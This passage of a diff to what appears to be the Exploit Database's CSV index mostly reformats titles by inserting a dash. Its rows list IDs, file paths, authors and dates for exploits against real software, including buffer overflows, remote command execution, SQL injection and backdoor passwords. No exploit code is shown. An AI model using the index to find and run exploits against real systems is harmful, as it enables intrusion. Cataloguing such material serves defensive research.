5.1.3 - Remote Username and Password Retrieval",2000-10-26,@stake,hardware,remote,0 20373,platforms/hp-ux/dos/20373.txt,"HP-UX 9.x/10.x/11.x - cu Buffer Overflow",2000-11-02,zorgon,hp-ux,dos,0 -20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0 +20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0 20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0 20376,platforms/unix/dos/20376.txt,"Wietse Venema Rpcbind Replacement 2.1 - Denial of Service",1998-11-13,"Patrick Gilbert",unix,dos,0 20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - top Format String",2000-11-01,truefinder,freebsd,local,0 20378,platforms/linux/local/20378.pl,"Debian GNU/Linux 3.1 - top Format String",2004-12-12,"Kevin Finisterre",linux,local,0 -20379,platforms/windows/dos/20379.txt,"Apple WebObjects Developer NT4 IIS4.0 CGI-adapter 4.5 Developer Remote Overflow",2000-04-04,"Bruce Potter",windows,dos,0 +20379,platforms/windows/dos/20379.txt,"Apple WebObjects Developer NT4 IIS4.0 CGI-adapter 4.5 - Developer Remote Overflow",2000-04-04,"Bruce Potter",windows,dos,0 20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0 20381,platforms/unix/local/20381.c,"ManTrap 1.6.1 - Root Directory Inode Disclosure",2000-11-01,f8labs,unix,local,0 20382,platforms/unix/local/20382.pl,"Debian 2.x / RedHat 6.2 / IRIX 5/6 / Solaris 2.x - Mail Reply-To Field",2000-11-01,"Gregory Duchemin",unix,local,0 @@ -17722,8 +17718,8 @@ id,file,description,date,author,platform,type,port 20391,platforms/php/webapps/20391.php,"Kamads Classifieds 2.0 - Admin Hash Disclosure",2012-08-09,Mr.tro0oqy,php,webapps,0 20392,platforms/windows/remote/20392.rb,"NetDecision 4.2 - TFTP Writable Directory Traversal Execution",2012-08-10,Metasploit,windows,remote,0 20393,platforms/windows/webapps/20393.py,"Cyclope Employee Surveillance Solution 6.0/6.1.0/6.2.0/6.2.1/6.3.0 - SQL Injection",2012-08-09,loneferret,windows,webapps,0 -20394,platforms/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow (1)",1998-12-26,duke,unix,remote,0 -20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez and dumped",unix,remote,0 +20394,platforms/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (1)",1998-12-26,duke,unix,remote,0 +20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez and dumped",unix,remote,0 20396,platforms/hp-ux/local/20396.sh,"HP-UX 10.x/11.x - Aserver PATH",1998-10-18,Loneguard,hp-ux,local,0 20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Path Disclosure",2000-11-10,sozni,cgi,remote,0 20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion",2012-08-10,GoLd_M,php,webapps,0 @@ -17739,7 +17735,7 @@ id,file,description,date,author,platform,type,port 20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0 20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - 'thesection' Directory Traversal",2000-11-20,zorgon,cgi,remote,0 20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0 -20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 Svgalib Buffer Overflow",2000-11-20,Synnergy.net,unix,local,0 +20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - Svgalib Buffer Overflow",2000-11-20,Synnergy.net,unix,local,0 20411,platforms/linux/local/20411.c,"Oracle 8.x - cmctl Buffer Overflow",2000-11-20,anonymous,linux,local,0 20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0 @@ -17757,7 +17753,7 @@ id,file,description,date,author,platform,type,port 20427,platforms/windows/remote/20427.txt,"Microsoft Windows Media Player 7.0 - (.asx) Buffer Overflow",2000-11-22,@stake,windows,remote,0 20428,platforms/php/webapps/20428.txt,"Phorum 3.x - PHP Configuration Disclosure",2000-11-23,"Joao Gouveia",php,webapps,0 20429,platforms/jsp/remote/20429.txt,"Caucho Technology Resin 1.2 - JSP Source Disclosure",2000-11-23,benjurry,jsp,remote,0 -20430,platforms/cgi/remote/20430.txt,"Info2www 1.0/1.1 CGI Input Handling",1998-03-03,"Niall Smart",cgi,remote,0 +20430,platforms/cgi/remote/20430.txt,"Info2www 1.0/1.1 - CGI Input Handling",1998-03-03,"Niall Smart",cgi,remote,0 20431,platforms/php/webapps/20431.txt,"Phorum 3.x - Arbitrary File Read",2000-11-24,"Joao Gouveia",php,webapps,0 20432,platforms/windows/dos/20432.txt,"Network Associates WebShield SMTP 4.5 - Invalid Outgoing Recipient Field DoS",2000-11-23,"Jari Helenius",windows,dos,0 20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 Metacharacter",1999-11-09,"Cody T. - hhp",cgi,remote,0 @@ -17776,11 +17772,11 @@ id,file,description,date,author,platform,type,port 20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 - wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 - rguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas",1996-07-03,"TTT Group",cgi,remote,0 -20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 and WebGlimpse 1.0 Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote,0 -20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0 +20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote,0 +20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0 20451,platforms/windows/local/20451.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_displayparamstmt Buffer Overflow",2000-12-01,"David Litchfield",windows,local,0 20452,platforms/aix/local/20452.c,"IBM AIX 4.x - setsenv Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local,0 -20453,platforms/aix/local/20453.c,"IBM AIX 4.3 digest Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local,0 +20453,platforms/aix/local/20453.c,"IBM AIX 4.3 digest - Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local,0 20454,platforms/aix/local/20454.sh,"IBM AIX 4.x - enq Buffer Overflow",2003-04-24,watercloud,aix,local,0 20455,platforms/aix/local/20455.c,"IBM AIX 4.3.x - piobe Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local,0 20456,platforms/windows/local/20456.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_showcolv Buffer Overflow",2000-12-01,"David Litchfield",windows,local,0 @@ -17788,14 +17784,14 @@ id,file,description,date,author,platform,type,port 20458,platforms/linux/local/20458.txt,"Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak",2000-11-30,"Lamagra Argamal",linux,local,0 20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE'",2000-12-01,Key,windows,remote,0 20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - PhoneBook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0 -20461,platforms/windows/remote/20461.txt,"Serv-U 2.4/2.5 FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0 -20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey Remote Command Execution",1998-08-04,Tom,unix,remote,0 +20461,platforms/windows/remote/20461.txt,"Serv-U 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0 +20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0 20463,platforms/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution",1997-07-10,"Razvan Dragomirescu",cgi,remote,0 20464,platforms/windows/dos/20464.py,"Spytech NetVizor 6.1 - (services.exe) DoS",2012-08-12,loneferret,windows,dos,0 20465,platforms/cgi/remote/20465.sh,"Squid Web Proxy 2.2 - cachemgr.cgi Unauthorized Connection",1999-07-23,fsaa,cgi,remote,0 20466,platforms/multiple/remote/20466.txt,"Apache 1.3 Web Server with PHP 3 - File Disclosure",2000-12-06,"china nsl",multiple,remote,0 20467,platforms/multiple/remote/20467.txt,"Inktomi Search Software 3.0 - Source Disclosure",2000-12-05,"china nsl",multiple,remote,0 -20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 Information Disclosure",2000-12-05,"china nsl",multiple,remote,0 +20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",multiple,remote,0 20469,platforms/unix/remote/20469.txt,"Endymion MailMan 3.0.x - Remote Arbitrary Command Execution",2000-12-06,"Secure Reality Advisories",unix,remote,0 20470,platforms/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL DoS",2000-12-05,benjurry,windows,dos,0 21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 @@ -17803,19 +17799,19 @@ id,file,description,date,author,platform,type,port 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak DoS",2000-12-06,blackangels,hardware,dos,0 20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker 2.5.4 Plugin - Persistent XSS",2012-08-13,"Chris Kellum",php,webapps,0 20476,platforms/php/webapps/20476.txt,"Hotel Booking Portal 0.1 - Multiple Vulnerabilities",2012-08-13,"Yakir Wizman",php,webapps,0 -20477,platforms/windows/webapps/20477.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway CSRF",2012-08-13,"Nir Valtman",windows,webapps,0 -20478,platforms/windows/webapps/20478.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps,0 +20477,platforms/windows/webapps/20477.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway - CSRF",2012-08-13,"Nir Valtman",windows,webapps,0 +20478,platforms/windows/webapps/20478.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway - Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps,0 20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)",2012-08-13,kingcope,linux,dos,0 20481,platforms/windows/remote/20481.txt,"Microsoft IIS 2.0/3.0 - Appended Dot Script Source Disclosure",1997-02-20,"Mark Joseph Edwards",windows,remote,0 20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl",1998-12-01,anonymous,novell,remote,0 20483,platforms/cgi/remote/20483.txt,"WEBgais 1.0 - websendmail Remote Command Execution",1997-07-04,"Razvan Dragomirescu",cgi,remote,0 -20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 +20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 20485,platforms/osx/local/20485.sh,"OS X Viscosity OpenVPN Client - Local Root Exploit",2012-08-13,zx2c4,osx,local,0 20486,platforms/unix/remote/20486.html,"Matt Wright FormMail 1.x - Cross-Site Request Forgery",1997-01-01,anonymous,unix,remote,0 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service",2000-12-08,"Filip Maertens",hardware,dos,0 20488,platforms/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x - File System Disclosure",2000-12-07,Dodger,windows,remote,0 20489,platforms/windows/remote/20489.txt,"keware technologies homeseer 1.4 - Directory Traversal",2000-12-07,"SNS Research",windows,remote,0 -20490,platforms/unix/remote/20490.c,"BitchX IRC Client 1.0 c17 DNS Buffer Overflow",2000-12-04,nimrood,unix,remote,0 +20490,platforms/unix/remote/20490.c,"BitchX IRC Client 1.0 c17 - DNS Buffer Overflow",2000-12-04,nimrood,unix,remote,0 20491,platforms/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage",2000-12-08,"Jouko Pynnonen",multiple,remote,0 20492,platforms/unix/remote/20492.txt,"ssldump 0.9 b1 - Format String",2000-12-11,c0ncept,unix,remote,0 20493,platforms/linux/local/20493.sh,"University of Washington Pico 3.x/4.x - File Overwrite",2000-12-11,mat,linux,local,0 @@ -17824,21 +17820,21 @@ id,file,description,date,author,platform,type,port 20496,platforms/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Buffer Overflow (2)",2000-12-07,diman,linux,remote,0 20497,platforms/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution",2000-12-11,rpc,cgi,remote,0 20501,platforms/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution 6.0 - SQL Injection",2012-08-15,Metasploit,windows,remote,7879 -20502,platforms/java/remote/20502.rb,"Novell ZENworks Asset Management Remote Execution",2012-08-15,Metasploit,java,remote,8080 +20502,platforms/java/remote/20502.rb,"Novell ZENworks Asset Management - Remote Execution",2012-08-15,Metasploit,java,remote,8080 20503,platforms/cgi/remote/20503.html,"Leif M. Wright simplestmail.cgi 1.0 - Remote Command Execution",2000-12-11,rpc,cgi,remote,0 20504,platforms/cgi/remote/20504.html,"Leif M. Wright - ad.cgi 1.0 Unchecked Input",2000-12-11,rpc,cgi,remote,0 20505,platforms/palm_os/local/20505.txt,"Secure Computing e.iD Authenticator for Palm 2.0 PIN Brute-Force",2000-12-14,@stake,palm_os,local,0 20506,platforms/cgi/remote/20506.html,"Leif M. Wright simplestguest.cgi 2.0 - Remote Command Execution",2000-12-14,suid,cgi,remote,0 20507,platforms/multiple/remote/20507.txt,"alex heiphetz group ezshopper 2.0/3.0 - Directory Traversal",2000-12-13,Nsfocus,multiple,remote,0 20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service Attack",1999-04-27,"Simon Helson",windows,dos,0 -20509,platforms/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,hardware,dos,0 +20509,platforms/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 - SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,hardware,dos,0 20510,platforms/windows/remote/20510.txt,"AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Buffer Overflow",2000-12-12,"Joe Testa",windows,remote,0 -20511,platforms/windows/remote/20511.txt,"AOL Instant Messenger 4.0/4.1.2010/4.2.1193 BuddyIcon Buffer Overflow",2000-12-12,@stake,windows,remote,0 -20512,platforms/unix/remote/20512.txt,"BSD ftpd 0.3.2 Single Byte Buffer Overflow",2000-12-18,Scrippie,unix,remote,0 +20511,platforms/windows/remote/20511.txt,"AOL Instant Messenger 4.0/4.1.2010/4.2.1193 - BuddyIcon Buffer Overflow",2000-12-12,@stake,windows,remote,0 +20512,platforms/unix/remote/20512.txt,"BSD ftpd 0.3.2 - Single Byte Buffer Overflow",2000-12-18,Scrippie,unix,remote,0 20513,platforms/multiple/remote/20513.txt,"iCat Electronic Commerce Suite 3.0 - File Disclosure",1997-11-08,"Mikael Johansson",multiple,remote,0 20514,platforms/solaris/local/20514.pl,"Solaris 2.5.1/2.6/7.0/8 patchadd Race Condition",2000-12-18,"Larry W. Cashdollar",solaris,local,0 20515,platforms/windows/dos/20515.txt,"Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption",2000-12-13,"Ilia Sprite",windows,dos,0 -20516,platforms/multiple/remote/20516.txt,"BEA Systems Weblogic Server 4.0 x/4.5 x/5.1 x Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote,0 +20516,platforms/multiple/remote/20516.txt,"BEA Systems Weblogic Server 4.0 x/4.5 x/5.1 x - Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote,0 20517,platforms/linux/local/20517.c,"Itetris 1.6.1/1.6.2 - Privileged Arbitrary Command Execution",2000-12-19,V9,linux,local,0 20518,platforms/windows/dos/20518.txt,"Infinite Interchange 3.61 - Denial of Service",2000-12-21,"SNS Research",windows,dos,0 20519,platforms/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",multiple,remote,0 @@ -17853,13 +17849,13 @@ id,file,description,date,author,platform,type,port 20528,platforms/windows/remote/20528.html,"Microsoft Windows Media Player 7.0 - Javascript URL",2001-01-01,"Georgi Guninski",windows,remote,0 20529,platforms/multiple/remote/20529.pl,"Lotus Domino Server 5.0.x - Directory Traversal (1)",2001-01-15,"Michael Smith",multiple,remote,0 20530,platforms/multiple/remote/20530.sh,"Lotus Domino Server 5.0.x - Directory Traversal (2)",2001-01-05,"Georgi Guninski",multiple,remote,0 -20531,platforms/multiple/dos/20531.txt,"IBM HTTP Server 1.3 AfpaCache/WebSphereNet.Data DoS",2001-01-08,"Peter Grundl",multiple,dos,0 +20531,platforms/multiple/dos/20531.txt,"IBM HTTP Server 1.3 - AfpaCache/WebSphereNet.Data DoS",2001-01-08,"Peter Grundl",multiple,dos,0 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0 20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution",2001-01-07,scott,cgi,remote,0 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - DoS",2001-01-10,"Murat - 2",multiple,dos,0 20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - DoS (Possible Code Execution)",2001-01-09,"Marc Lehmann",linux,dos,0 20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 - SIZE Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0 -20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0 +20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 - Backdoor Password",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 - Incorrect File Permissions",2001-01-11,"Tamer Sahin",php,webapps,0 20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload",2012-08-15,ICheer_No0M,php,webapps,0 20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)",2012-08-21,Kc57,linux,webapps,0 @@ -17872,15 +17868,15 @@ id,file,description,date,author,platform,type,port 20547,platforms/windows/remote/20547.txt,"Microsoft Internet Explorer - Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0 20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Stored XSS",2012-08-16,"Shai rod",php,webapps,0 20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - CSRF",2012-08-16,DaOne,php,webapps,0 -20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) Remote Execution",2012-08-16,iJoo,linux,remote,0 +20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) - Remote Execution",2012-08-16,iJoo,linux,remote,0 20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4.0 / Outlook 2000/5.5 - MSHTML.DLL Crash",2001-01-15,"Thor Larholm",windows,dos,0 20553,platforms/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 - (.wmz) Arbitrary Java Applet",2001-01-15,"Georgi Guninski",windows,remote,0 20554,platforms/linux/local/20554.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (1)",2001-01-13,IhaQueR,linux,local,0 20555,platforms/linux/local/20555.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (2)",2001-01-13,IhaQueR,linux,local,0 20556,platforms/linux/local/20556.c,"Debian Linux 2.2 - splitvt Format String",2001-01-16,"Michel Kaempf",linux,local,0 20557,platforms/windows/remote/20557.pl,"Omnicron OmniHTTPD 2.0.7 - File Corruption and Command Execution",2001-08-01,"Joe Testa",windows,remote,0 -20558,platforms/multiple/dos/20558.txt,"Apache 1.2 Web Server DoS",1997-12-30,"Michal Zalewski",multiple,dos,0 -20559,platforms/windows/remote/20559.c,"tinyproxy tinyproxy 1.3.2/1.3.3 Heap Overflow",2001-01-17,CyRaX,windows,remote,0 +20558,platforms/multiple/dos/20558.txt,"Apache 1.2 Web Server - DoS",1997-12-30,"Michal Zalewski",multiple,dos,0 +20559,platforms/windows/remote/20559.c,"tinyproxy tinyproxy 1.3.2/1.3.3 - Heap Overflow",2001-01-17,CyRaX,windows,remote,0 20560,platforms/unix/local/20560.c,"SSH 1.2.x - Secure-RPC Weak Encrypted Authentication",2001-01-16,"Richard Silverman",unix,local,0 20561,platforms/linux/dos/20561.pl,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service (1)",1997-06-12,"Frank DENIS",linux,dos,0 20562,platforms/linux/dos/20562.c,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service (2)",1997-06-12,"Wietse Venema",linux,dos,0 @@ -17914,7 +17910,7 @@ id,file,description,date,author,platform,type,port 20589,platforms/windows/dos/20589.c,"eEye Digital Security IRIS 1.0.1 - GET Denial of Service",2001-01-21,grazer,windows,dos,0 20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 - Upgrade BDIR.HTR",1998-12-25,"rain forest puppy",windows,remote,0 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure",2001-01-24,"Security Research Team",multiple,remote,0 -20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",jsp,remote,0 +20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 - JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",jsp,remote,0 20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - ipfw Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0 20594,platforms/unix/remote/20594.txt,"Wu-Ftpd 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote,0 20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,multiple,remote,0 @@ -17922,7 +17918,7 @@ id,file,description,date,author,platform,type,port 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote,0 20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQLi",2012-08-17,loneferret,php,webapps,0 20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Root",1994-02-24,CIAC,unix,remote,0 -20600,platforms/windows/remote/20600.c,"SmartMax MailMax 1.0 SMTP Buffer Overflow",1999-02-13,_mcp_,windows,remote,0 +20600,platforms/windows/remote/20600.c,"SmartMax MailMax 1.0 - SMTP Buffer Overflow",1999-02-13,_mcp_,windows,remote,0 20601,platforms/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",multiple,remote,0 20602,platforms/solaris/remote/20602.c,"Solaris x86 2.4/2.5 nlps_server Buffer Overflow",1998-04-01,"Last Stage of Delirium",solaris,remote,0 20603,platforms/solaris/local/20603.c,"Solaris 7/8 ximp40 Library Buffer Overflow",2001-01-31,UNYUN,solaris,local,0 @@ -17935,25 +17931,25 @@ id,file,description,date,author,platform,type,port 20610,platforms/multiple/dos/20610.txt,"Allaire JRun 3.0 Servlet - DoS",2000-10-31,"Allaire Security",multiple,dos,0 20611,platforms/cgi/remote/20611.txt,"anaconda foundation 1.4-1.9 - Directory Traversal",2000-10-13,pestilence,cgi,remote,0 20614,platforms/windows/remote/20614.txt,"aolserver 3.2 Win32 - Directory Traversal",2001-02-06,joetesta,windows,remote,0 -20615,platforms/unix/remote/20615.txt,"SSH 1.2.30 Daemon Logging Failure",2001-02-05,"Jose Nazario",unix,remote,0 +20615,platforms/unix/remote/20615.txt,"SSH 1.2.30 - Daemon Logging Failure",2001-02-05,"Jose Nazario",unix,remote,0 20616,platforms/windows/remote/20616.txt,"soft lite serverworx 3.0 - Directory Traversal",2001-02-07,joetesta,windows,remote,0 20617,platforms/unix/remote/20617.c,"SSH 1.2.x - CRC-32 Compensation Attack Detector",2001-02-08,"Michal Zalewski",unix,remote,0 20618,platforms/multiple/remote/20618.txt,"IBM Net.Commerce 2.0/3.x/4.x - orderdspc.d2w order_rn Option SQL Injection",2001-02-05,"Rudi Carell",multiple,remote,0 20619,platforms/linux/remote/20619.c,"Linuxconf 1.1.6 r10 - Remote Buffer Overflow",1999-12-21,R00T-X,linux,remote,0 -20620,platforms/sco/remote/20620.c,"SCO UNIX 5 calserver Remote Buffer Overflow",1998-12-29,"Leshka Zakharoff",sco,remote,0 +20620,platforms/sco/remote/20620.c,"SCO UNIX 5 calserver - Remote Buffer Overflow",1998-12-29,"Leshka Zakharoff",sco,remote,0 20621,platforms/unix/local/20621.txt,"Micro Focus Cobol 4.1 - Arbitrary Command Execution",2001-02-12,"Dixie Flatline",unix,local,0 20622,platforms/linux/remote/20622.c,"Xmail 0.5/0.6 CTRLServer - Remote Arbitrary Commands",2001-02-01,isno,linux,remote,0 20623,platforms/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal",2001-02-12,slipy,cgi,remote,0 20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 - Font Parsing Code Execution",2012-08-20,Metasploit,windows,remote,0 20625,platforms/multiple/remote/20625.txt,"SilverPlatter WebSPIRS 3.3.1 - File Disclosure",2001-02-12,cuctema,multiple,remote,0 20626,platforms/linux/local/20626.c,"Linux Kernel 2.2.x - sysctl() Memory Reading Proof of Concept",2001-02-09,"Chris Evans",linux,local,0 -20627,platforms/php/webapps/20627.py,"IlohaMail Webmail Stored XSS",2012-08-18,"Shai rod",php,webapps,0 +20627,platforms/php/webapps/20627.py,"IlohaMail Webmail - Stored XSS",2012-08-18,"Shai rod",php,webapps,0 20628,platforms/windows/remote/20628.txt,"his software auktion 1.62 - Directory Traversal",2001-02-12,cuctema,windows,remote,0 20629,platforms/cgi/remote/20629.txt,"Way-Board 2.0 - File Disclosure",2001-02-12,cuctema,cgi,remote,0 20630,platforms/cgi/remote/20630.txt,"Martin Hamilton ROADS 2.3 - File Disclosure",2001-02-12,cuctema,cgi,remote,0 20631,platforms/cgi/remote/20631.txt,"PALS Library System WebPALS 1.0 - pals-cgi Traversal Arbitrary File Read",2001-02-02,cuctema,cgi,remote,0 20632,platforms/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 - pals-cgi Arbitrary Command Execution",2001-02-02,cuctema,cgi,remote,0 -20633,platforms/cgi/remote/20633.txt,"Brightstation Muscat 1.0 Root Path Disclosure",2001-02-12,cuctema,cgi,remote,0 +20633,platforms/cgi/remote/20633.txt,"Brightstation Muscat 1.0 - Root Path Disclosure",2001-02-12,cuctema,cgi,remote,0 20634,platforms/windows/dos/20634.txt,"John Roy Pi3Web 1.0.1 - Buffer Overflow",2001-02-15,joetesta,windows,dos,0 20635,platforms/multiple/remote/20635.txt,"caucho technology resin 1.2 - Directory Traversal",2001-02-16,joetesta,multiple,remote,0 20636,platforms/linux/remote/20636.txt,"thinking arts es.one 1.0 - Directory Traversal",2001-02-16,slipy,linux,remote,0 @@ -17964,12 +17960,12 @@ id,file,description,date,author,platform,type,port 20641,platforms/windows/dos/20641.txt,"Working Resources BadBlue 1.2.7 - DoS",2001-02-20,"SNS Research",windows,dos,0 20642,platforms/cgi/remote/20642.pl,"Adcycle 0.77/0.78 - AdLibrary.pm Session Access",2001-02-19,"Neil 